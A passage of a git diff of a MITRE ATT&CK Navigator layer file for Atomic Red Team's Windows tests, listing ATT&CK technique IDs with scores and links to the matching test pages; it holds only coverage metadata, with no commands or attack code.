Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View 